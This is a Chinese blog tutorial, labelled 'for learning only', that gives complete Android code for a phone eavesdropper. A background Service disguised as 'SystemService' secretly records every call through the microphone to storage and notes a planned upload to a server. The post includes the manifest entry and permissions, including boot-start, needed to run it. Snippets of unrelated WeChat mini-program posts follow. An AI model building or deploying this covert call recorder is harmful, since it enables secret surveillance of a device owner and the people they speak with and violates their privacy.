安卓电话窃听器小程序(仅用于学习)

写这个小程序首先需要了解安卓系统的后台服务怎么实现。Service是安卓的四大组件之一。

其次需要了解安卓的进程管理,一个安卓程序关闭后,程序虽然不可见,但是程序的进程往往没有被杀掉,目的是下次启动的时候方便,但是内存资源有限,不可能无限制的保留线程在内存中的状态,所以安卓采用任务栈的方式来管理进程。当内存资源不足时,通过将任务栈中优先级比较低的进程杀掉来释放资源。

安卓有5个进程优先级:

1.前台进程 (Foreground process) 当前用户正在使用的进程

2.可视进程(Visible process) 用户能看到当前进程的界面,但是该进程不一定是用户正在使用的

3.服务进程(Service process) 用户程序的服务组件在后台运行

4.后台进程(Background process) 应用程序没有服务组件在运行,程序处于最小化状态

5.空进程(Empty process) 没有任何的activity

优先级由上到下降低,任务栈先杀进程的话肯定先杀空进程了。

电话窃听器的实现的话就是在后台维护一个Service来监听用户的打电话状态了,将电话录音。

1.后台服务的启动一般使用Intent,并且使用隐式意图。

//开启服务。
        Intent intent = new Intent(this,SystemService.class);
        startService(intent);
    }
//停止服务。
        Intent intent = new Intent(this,SystemService.class);
        stopService(intent);

2.SystemService是我们实现的功能类,继承自Service。

public class SystemService extends Service {
    // 电话管理器
    private TelephonyManager tm;
    // 监听器对象
    private MyListener listener;
    //声明录音机
    private MediaRecorder mediaRecorder;

    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }

    // 服务创建的时候调用的方法
    @Override
    public void onCreate() {
        // 后台监听电话的呼叫状态。
        // 得到电话管理器
        tm = (TelephonyManager) this.getSystemService(TELEPHONY_SERVICE);
        listener = new MyListener();
        tm.listen(listener, PhoneStateListener.LISTEN_CALL_STATE);
        super.onCreate();
    }

    private class MyListener extends PhoneStateListener {
        // 当电话的呼叫状态发生变化的时候调用的方法
        @Override
        public void onCallStateChanged(int state, String incomingNumber) {
            super.onCallStateChanged(state, incomingNumber);
            try {
                switch (state) {
                case TelephonyManager.CALL_STATE_IDLE://空闲状态。
                    if(mediaRecorder!=null){
                        //8.停止捕获
                        mediaRecorder.stop();
                        //9.释放资源
                        mediaRecorder.release();
                        mediaRecorder = null;
                        System.out.println("录制完毕,上传文件到服务器。");
                    }

                    break;
                case TelephonyManager.CALL_STATE_RINGING://零响状态。

                    break;
                case TelephonyManager.CALL_STATE_OFFHOOK://通话状态
                    //开始录音
                    //1.实例化一个录音机
                    mediaRecorder = new MediaRecorder();
                    //2.指定录音机的声音源
                    mediaRecorder.setAudioSource(MediaRecorder.AudioSource.MIC);
                    //3.设置录制的文件输出的格式
                    mediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.DEFAULT);
                    //4.指定录音文件的名称
                    File file = new File(Environment.getExternalStorageDirectory(),System.currentTimeMillis()+".3gp");
                    mediaRecorder.setOutputFile(file.getAbsolutePath());
                    //5.设置音频的编码
                    mediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.DEFAULT);
                    //6.准备开始录音
                    mediaRecorder.prepare();
                    //7.开始录音
                    mediaRecorder.start();
                    break;
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
    // 服务销毁的时候调用的方法
    @Override
    public void onDestroy() {
        super.onDestroy();
        // 取消电话的监听
        System.out.println("ondestory");
        tm.listen(listener, PhoneStateListener.LISTEN_NONE);
        listener = null;
    }

}

3.Service要在AndroidMainfest.xml中配置下

  <service android:name="com.itheima.phonelistener.SystemService" ></service>   

4.权限相关。

<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.RECORD_AUDIO" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
时间: 2024-11-02 01:55:51

安卓电话窃听器小程序(仅用于学习)的相关文章

微信小程序开发:学习笔记[1]——Hello World

微信小程序开发:学习笔记[1]--Hello World 快速开始 1.前往微信公众平台下载微信开发者工具. 地址:https://mp.weixin.qq.com/debug/wxadoc/dev/devtools/download.html 2.打开微信开发者工具,并新建项目 打开微信开发者工具,选择新建小程序项目,我们先不需理解AppID的概念,新建项目时选择无AppID,并取消勾选"建立普通快速启动模板"的选项. 3.在根目录添加代码 1.在根目录创建app.json文件 2.

微信小程序开发:学习笔记[2]——WXML模板

微信小程序开发:学习笔记[2]--WXML模板 快速开始 介绍 WXML 全称是 WeiXin Markup Language,是小程序框架设计的一套标签语言,结合小程序的基础组件.事件系统,可以构建出页面的结构. 打开开发工具的编辑器,在根目录下找到 app.json 文件,双击打开,在 "pages/index/index" 上新增一行 "pages/wxml/index" 保存文件.模拟器刷新后,读者可以在编辑器中找到 pages/wxml/index.wxm

微信小程序开发:学习笔记[3]——WXSS样式

微信小程序开发:学习笔记[3]--WXSS样式 快速开始 介绍 WXSS(WeiXin Style Sheets)是一套用于小程序的样式语言,用于描述WXML的组件样式,也就是视觉上的效果. WXSS与Web开发中的CSS类似.为了更适合小程序开发,WXSS对CSS做了一些补充以及修改. 文件组成 项目公共样式:根目录中的app.wxss为项目公共样式,它会被注入到小程序的每个页面. 页面样式:与app.json注册过的页面同名且位置同级的WXSS文件.比如注册了pages/rpx/index页

微信小程序开发:学习笔记[5]——JavaScript脚本

微信小程序开发:学习笔记[5]--JavaScript脚本 快速开始 介绍 小程序的主要开发语言是 JavaScript ,开发者使用 JavaScript 来开发业务逻辑以及调用小程序的 API 来完成业务需求. 在大部分开发者看来,ECMAScript和JavaScript表达的是同一种含义,但是严格的说,两者的意义是不同的.ECMAScript是一种由Ecma国际通过ECMA-262标准化的脚本程序设计语言, JavaScript 是 ECMAScript 的一种实现.理解 JavaScr

微信小程序开发入门学习(1):石头剪刀布小游戏

从今天起开始捣鼓小程序了2018-12-17   10:02:15 跟着教程做了第一个入门实例有兴趣的朋友可以看看: 猜拳游戏布局 程序达到的效果 猜拳游戏的布局是纵向显示了三个组件:文本组件(text).图像组件(image)和按钮组件(button).在创建小程序工程时,默认建立了两个页面:index 和 logs.我们不需要管 logs,在这个例子中只修改和 index 页面相关的文件,index 是小程序第一个显示的页面,其中 index.wxml 文件是 index 页面的布局文件.

小程序布局基础学习

今日工作:今天主要进行了微信开发者工具有关布局基础内容的学习,例如flex容器属性.相对定为和绝对定位还有<view></view>.<image></image>.<swiper></swiper>等组件的使用并实际操作将这些内容加进了小程序里面,增加了首页和我的界面的内容,但也遇到了一些问题比如本来计划在首页添加一个点餐按钮和一个搜索框可以连接到订单界面但并没有能够成功.然后还将相关代码上传到gitlab上面. 明日计划:计划明天

Android小程序-乐学成语学习(一)

目标效果: 1.程序所需素材:http://pan.baidu.com/s/1kV3y1Cz 2.新建项目,在res目录下新建raw文件夹,将素材中idioms.db数据库复制到该文件夹下,这是因为raw文件夹中的东西,android会原封不动的拷贝到程序中,而不会转换为二进制文件. 3.src目录下新建七个包,adapter包用于存放适配器,activity包用于存放页面活动相关的代码,dao包用于存放数据操作相关的代码,db包用于数据库相关的代码,util包用于存放所有工具相关的代码,tes

微信小程序开发视频教程学习(第6天)2017年6月29日:上午前端下午PHP

学习内容 上午前端:CSS学习 下午PHP:  系统函数 笔记 1.CSS优先级顺序 行内样式 > 内部样式 > 导入样式 说明: 1.链入外部样式表和内部样式表的优先级取决于所处位置的先后 2.根据就近原则(最后定义的优先级最高) 2.链接伪类的顺序,按照这个顺序才是有效的 :Link  >  :Visited  > :Hover >:Active 3.PHP的字符串函数 ucfirst() //将句子的首字母转换为大写 ucwords() //将句子的每个单词替换为大写

小程序地区选择器学习链接

学习链接:https://blog.csdn.net/yeshennet/article/details/79031012 <view class="section__title">省市区选择器</view> <picker mode="region" bindchange="bindRegionChange" value="{{region}}" custom-item="{{cust